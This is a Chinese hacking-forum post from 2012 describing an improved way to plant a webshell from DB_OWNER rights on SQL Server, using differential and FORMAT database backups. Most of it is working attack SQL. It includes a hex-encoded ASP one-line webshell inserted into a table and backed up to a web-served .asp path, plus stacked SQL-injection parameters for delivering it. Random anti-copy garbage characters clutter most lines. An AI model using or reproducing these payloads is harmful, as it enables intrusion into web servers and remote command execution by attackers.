找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2215|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:57:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
减少备份文件大小,得到可执行的webshell成功率提高不少6 C( c; Q  ?  s+ u/ O6 J
3 O, ]$ E( T. t8 ?* E& `
一利用差异备份
+ u1 n& l! J# f& r: Y+ ]% f* K加一个参数WITH DIFFERENTIAL; p& f" T' W( o, ^

, N( D) y6 p6 o/ B6 A  C  gdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s# R% t8 }: u3 }+ J3 b
create table [dbo].[xiaolu] ([cmd] [image]);
  M/ p4 l9 t: e) _' C$ |5 Ginsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E); P9 X! @% K2 ?* }) s7 v0 j( \
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
, a: L3 K4 G, j: g& I# V
( s# U) n- ]+ f+ u; t( i/ y二利用完全FORMAT( x' [3 n8 o9 a7 M, d6 d3 d$ c
加一个参数WITH FROMAT
- P& w" G  P% P$ o/ X. K7 ]% S有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以% V. O$ g" f0 \" s' p

' L& g* V$ q% T1 e5 s+ |4 ]declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s; A9 h+ z. Y: W) T2 n
create table [dbo].[xiaolu] ([cmd] [image]); insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
! w' Y  g# B  O. s& F% v, k" Zdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT; ]% g9 n6 J% P$ A6 |
1 w& f$ H$ \$ j  ~) G: A9 D. j
总的来说就是那么简单几句,下面以备份数据库model为例子
$ a1 I% ^4 G( i( D7 v* R
, n0 v7 }# x" u1 s% n9 pid=1;use model create table cmd(str image);insert into cmd(str) values (”)
7 p- n# h* M) F* _) H! `# T6 ?9 T. Y2 r- H, F- M) q
id=1;backup database model to disk=’你的路径‘ with differential,format;–
2 Y$ |: a8 L+ E) U6 k! ]& A
  o6 Q- ?6 b) i: S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表